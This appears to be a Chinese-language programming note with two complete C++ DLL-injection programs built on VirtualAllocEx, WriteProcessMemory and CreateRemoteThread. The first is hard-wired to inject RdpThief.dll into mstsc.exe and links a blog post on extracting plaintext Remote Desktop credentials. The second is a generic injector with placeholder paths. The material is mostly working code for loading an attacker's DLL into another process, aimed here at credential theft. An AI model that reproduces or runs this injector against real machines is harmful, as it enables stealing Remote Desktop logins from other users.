dll注入 c++

按进程名搜索 PID,然后向对应 PID 的进程注入 DLL(VirtualAllocEx + WriteProcessMemory + CreateRemoteThread 调用 LoadLibraryW 的经典方式)。注意:注入程序、目标进程和 DLL 三者的位数(x86/x64)必须一致;当前用户还必须有权限打开目标进程(跨用户或更高完整性级别的进程通常需要管理员权限)。

// detourstest.cpp : 定义控制台应用程序的入口点。
//

#include "stdafx.h"
#include "Windows.h"
#include <detours.h>
#include <string.h>
#include <tlhelp32.h>
#pragma comment (lib,"detours.lib")

// Element count of a real array (not a pointer). Not used by the code shown in this file.
#define ArraySize(ptr)    (sizeof(ptr) / sizeof(ptr[0]))
/*
static int(WINAPI *TrueMessageBox)(HWND, LPCTSTR, LPCTSTR, UINT) = MessageBox;
int WINAPI OurMessageBox(HWND hWnd, LPCTSTR lpText, LPCTSTR lpCaption, UINT uType) {
	return TrueMessageBox(NULL, L"Hooked", lpCaption, 0);
}
int main()
{
	DetourTransactionBegin();
	DetourUpdateThread(GetCurrentThread());
	DetourAttach(&(PVOID&)TrueMessageBox, OurMessageBox);
	DetourTransactionCommit();
	MessageBox(NULL, L"Hello", L"Hello", 0);
	DetourTransactionBegin();
	DetourUpdateThread(GetCurrentThread());
	DetourDetach(&(PVOID&)TrueMessageBox, OurMessageBox);
	DetourTransactionCommit();
}
*/


// Looks up a running process by image name (e.g. L"mstsc.exe") and stores its
// PID in dwPid. Returns FALSE when the snapshot fails or no process matches;
// dwPid is left untouched in that case. Defined below.
BOOL FindProcessPid(LPCWSTR ProcessName, DWORD& dwPid);


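// Starts LoadLibraryW(RemotePath) on a new thread inside the target process
// and waits for it to finish.
//
// ProcessHandle  Handle opened with at least PROCESS_CREATE_THREAD,
//                PROCESS_QUERY_INFORMATION, PROCESS_VM_OPERATION,
//                PROCESS_VM_WRITE and PROCESS_VM_READ.
// RemotePath     Address, in the target, of a NUL-terminated wide DLL path.
//
// Returns TRUE when the remote thread ran and reported a non-zero exit code.
// The exit code is the low 32 bits of the HMODULE LoadLibraryW returned, so
// zero means the load failed; non-zero is a strong (not absolute) signal of
// success on x64.
static BOOL RunRemoteLoadLibrary(HANDLE ProcessHandle, PVOID RemotePath)
{
	// NOTE(review): this relies on kernel32.dll being mapped at the same
	// address in the target as in this process, which holds for processes of
	// the same bitness on the same boot — the reason the bitness must match.
	FARPROC loadLibrary = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "LoadLibraryW");
	if (loadLibrary == NULL)
	{
		printf("GetProcAddress(LoadLibraryW) failed: %lu\n", GetLastError());
		return FALSE;
	}

	HANDLE ThreadHandle = CreateRemoteThread(ProcessHandle, NULL, 0,
		(LPTHREAD_START_ROUTINE)loadLibrary, RemotePath, 0, NULL);
	if (ThreadHandle == NULL)
	{
		printf("CreateRemoteThread failed: %lu\n", GetLastError());
		return FALSE;
	}

	// The remote thread reads RemotePath, so the caller must keep that memory
	// alive until this wait returns. A DllMain that never returns would block
	// here forever; use a timeout instead of INFINITE if that is a concern.
	WaitForSingleObject(ThreadHandle, INFINITE);

	DWORD exitCode = 0;
	BOOL loaded = GetExitCodeThread(ThreadHandle, &exitCode) && exitCode != 0;
	CloseHandle(ThreadHandle);
	if (!loaded)
	{
		printf("LoadLibraryW in target returned 0 (e.g. DLL not found, wrong bitness, DllMain failed)\n");
	}
	return loaded;
}

// Copies DllPath into the target process and loads it there.
//
// ProcessHandle  See RunRemoteLoadLibrary.
// DllPath        Wide, NUL-terminated absolute path of the DLL.
// DllPathBytes   Size of DllPath in bytes, including the terminator.
//
// Returns TRUE on success. The remote buffer is always released before
// returning, but only after the remote thread has finished with it.
static BOOL InjectDll(HANDLE ProcessHandle, const wchar_t* DllPath, SIZE_T DllPathBytes)
{
	PVOID RemoteBuffer = VirtualAllocEx(ProcessHandle, NULL, DllPathBytes, MEM_COMMIT, PAGE_READWRITE);
	if (RemoteBuffer == NULL)
	{
		printf("VirtualAllocEx failed: %lu\n", GetLastError());
		return FALSE;
	}

	BOOL ok = FALSE;
	if (!WriteProcessMemory(ProcessHandle, RemoteBuffer, DllPath, DllPathBytes, NULL))
	{
		printf("WriteProcessMemory failed: %lu\n", GetLastError());
	}
	else
	{
		ok = RunRemoteLoadLibrary(ProcessHandle, RemoteBuffer);
	}

	// Safe to free now: the remote thread has either finished or never started.
	VirtualFreeEx(ProcessHandle, RemoteBuffer, 0, MEM_RELEASE);
	return ok;
}

// Entry point: finds the target by image name and injects the DLL into it.
// Exit status is 0 on success and 1 on any failure (process not found, cannot
// open it, or the remote load failed), so a caller can tell the difference.
int main()
{
	// Hard-coded target and payload. Both must match this program's bitness.
	LPCWSTR Name = L"mstsc.exe";
	wchar_t DllPath[] = L"C:\\RdpThief.dll";
	DWORD dwPid = 0;

	if (!FindProcessPid(Name, dwPid))
	{
		printf("[%ls] [Not Found]\n", Name);
		return 1;
	}

	// Request only the rights the injection needs instead of PROCESS_ALL_ACCESS.
	const DWORD access = PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
	                     PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ;
	HANDLE ProcessHandle = OpenProcess(access, FALSE, dwPid);
	if (ProcessHandle == NULL)
	{
		// The original closed this NULL handle unconditionally; now we bail out.
		printf("[%ls] [%lu] OpenProcess failed: %lu\n", Name, dwPid, GetLastError());
		return 1;
	}

	// sizeof DllPath counts the terminating L'\0', so the remote copy is a
	// complete wide string for LoadLibraryW.
	BOOL ok = InjectDll(ProcessHandle, DllPath, sizeof DllPath);
	CloseHandle(ProcessHandle);
	return ok ? 0 : 1;
}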

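// Looks up the PID of the first running process whose image name matches
// ProcessName.
//
// ProcessName  Image file name such as L"mstsc.exe". Compared with lstrcmpiW
//              because Windows file names are case-insensitive, so
//              L"MSTSC.EXE" matches as well (the original lstrcmp did not).
// dwPid        Receives the PID on success; left untouched on failure.
//
// Returns TRUE on a match; FALSE for a NULL/empty name, a snapshot failure, or
// no match. When several instances are running only the first one in snapshot
// order is reported.
BOOL FindProcessPid(LPCWSTR ProcessName, DWORD& dwPid)
{
	if (ProcessName == NULL || ProcessName[0] == L'\0')
	{
		return FALSE;
	}

	// Snapshot of every process on the system.
	HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (hProcessSnap == INVALID_HANDLE_VALUE)
	{
		return FALSE;
	}

	// Explicit W variants: ProcessName is always wide, so this no longer
	// depends on UNICODE being defined for the whole project.
	PROCESSENTRY32W pe32;
	pe32.dwSize = sizeof pe32;   // Process32FirstW fails if this is not set

	BOOL bRet = FALSE;
	if (Process32FirstW(hProcessSnap, &pe32))
	{
		do
		{
			if (lstrcmpiW(ProcessName, pe32.szExeFile) == 0)
			{
				dwPid = pe32.th32ProcessID;
				bRet = TRUE;
				break;
			}
		} while (Process32NextW(hProcessSnap, &pe32));
	}

	CloseHandle(hProcessSnap);
	return bRet;
}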

https://www.c0bra.xyz/2019/12/24/mstsc%E4%B8%AD%E6%8F%90%E5%8F%96%E6%98%8E%E6%96%87%E5%87%AD%E6%8D%AE-RdpThief%E5%AE%9E%E8%B7%B5/

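以下是C语言代码实现DLL注入:

```cpp
#include <Windows.h>
#include <TlHelp32.h>
#include <tchar.h>
#include <stdio.h>

// Returns the PID of the first process whose image name equals processName
// (case-insensitive, as Windows file names are), or 0 when the snapshot
// fails or nothing matches.
DWORD GetProcessID(LPCTSTR processName)
{
	HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (hProcessSnap == INVALID_HANDLE_VALUE)
	{
		printf("CreateToolhelp32Snapshot failed: %lu\n", GetLastError());
		return 0;
	}

	PROCESSENTRY32 pe32;
	pe32.dwSize = sizeof pe32;   // required before Process32First
	if (!Process32First(hProcessSnap, &pe32))
	{
		printf("Process32First failed: %lu\n", GetLastError());
		CloseHandle(hProcessSnap);
		return 0;
	}

	DWORD dwProcessId = 0;
	do
	{
		if (_tcsicmp(pe32.szExeFile, processName) == 0)
		{
			dwProcessId = pe32.th32ProcessID;
			break;
		}
	} while (Process32Next(hProcessSnap, &pe32));
	CloseHandle(hProcessSnap);

	if (dwProcessId == 0)
	{
		// _tprintf's %s takes a TCHAR string in both ANSI and UNICODE builds;
		// streaming an LPCTSTR into cout printed a pointer under UNICODE.
		_tprintf(TEXT("Cannot find the process: %s\n"), processName);
	}
	return dwProcessId;
}

// Injects dllPath into processName. Exit status 0 on success, 1 on failure.
int main(int argc, char* argv[])
{
	TCHAR dllPath[MAX_PATH] = TEXT("DLL_PATH");    // full path of the DLL to load
	LPCTSTR processName = TEXT("PROCESS_NAME");    // image name of the target

	DWORD dwProcessId = GetProcessID(processName);
	if (dwProcessId == 0)
	{
		return 1;
	}

	// Only the rights VirtualAllocEx/WriteProcessMemory/CreateRemoteThread need.
	HANDLE hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
	                              PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ,
	                              FALSE, dwProcessId);
	if (hProcess == NULL)
	{
		printf("OpenProcess failed: %lu\n", GetLastError());
		return 1;
	}

	// sizeof dllPath is MAX_PATH * sizeof(TCHAR). Passing MAX_PATH here copied
	// only half of the buffer in a UNICODE build.
	LPVOID pRemoteBuf = VirtualAllocEx(hProcess, NULL, sizeof dllPath, MEM_COMMIT, PAGE_READWRITE);
	if (pRemoteBuf == NULL)
	{
		printf("VirtualAllocEx failed: %lu\n", GetLastError());
		CloseHandle(hProcess);
		return 1;
	}
	if (!WriteProcessMemory(hProcess, pRemoteBuf, dllPath, sizeof dllPath, NULL))
	{
		printf("WriteProcessMemory failed: %lu\n", GetLastError());
		VirtualFreeEx(hProcess, pRemoteBuf, 0, MEM_RELEASE);
		CloseHandle(hProcess);
		return 1;
	}

	// The loader must match the character type of dllPath: LoadLibraryW would
	// misread an ANSI path.
#ifdef UNICODE
	const char* loaderName = "LoadLibraryW";
#else
	const char* loaderName = "LoadLibraryA";
#endif
	LPTHREAD_START_ROUTINE pThreadProc =
		(LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")), loaderName);
	if (pThreadProc == NULL)
	{
		printf("GetProcAddress(%s) failed: %lu\n", loaderName, GetLastError());
		VirtualFreeEx(hProcess, pRemoteBuf, 0, MEM_RELEASE);
		CloseHandle(hProcess);
		return 1;
	}

	HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, pThreadProc, pRemoteBuf, 0, NULL);
	if (hThread == NULL)
	{
		printf("CreateRemoteThread failed: %lu\n", GetLastError());
		VirtualFreeEx(hProcess, pRemoteBuf, 0, MEM_RELEASE);
		CloseHandle(hProcess);
		return 1;
	}

	// The remote thread reads pRemoteBuf; wait for it before freeing the buffer.
	WaitForSingleObject(hThread, INFINITE);

	// Exit code is the low 32 bits of the HMODULE; 0 means the load failed.
	int rc = 0;
	DWORD exitCode = 0;
	if (!GetExitCodeThread(hThread, &exitCode) || exitCode == 0)
	{
		printf("LoadLibrary in the target returned 0\n");
		rc = 1;
	}

	CloseHandle(hThread);
	VirtualFreeEx(hProcess, pRemoteBuf, 0, MEM_RELEASE);
	CloseHandle(hProcess);
	return rc;
}
```

代码中需要填写DLL文件路径和目标进程名称,然后通过调用GetProcessID函数获取指定进程的进程ID,最后将DLL路径写入目标进程并在其中创建远程线程调用LoadLibrary加载该DLL。需要注意的是,注入程序、目标进程和DLL三者的位数(x86/x64)必须一致:向64位进程注入时,本程序需按x64平台编译,DLL也必须是64位的。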
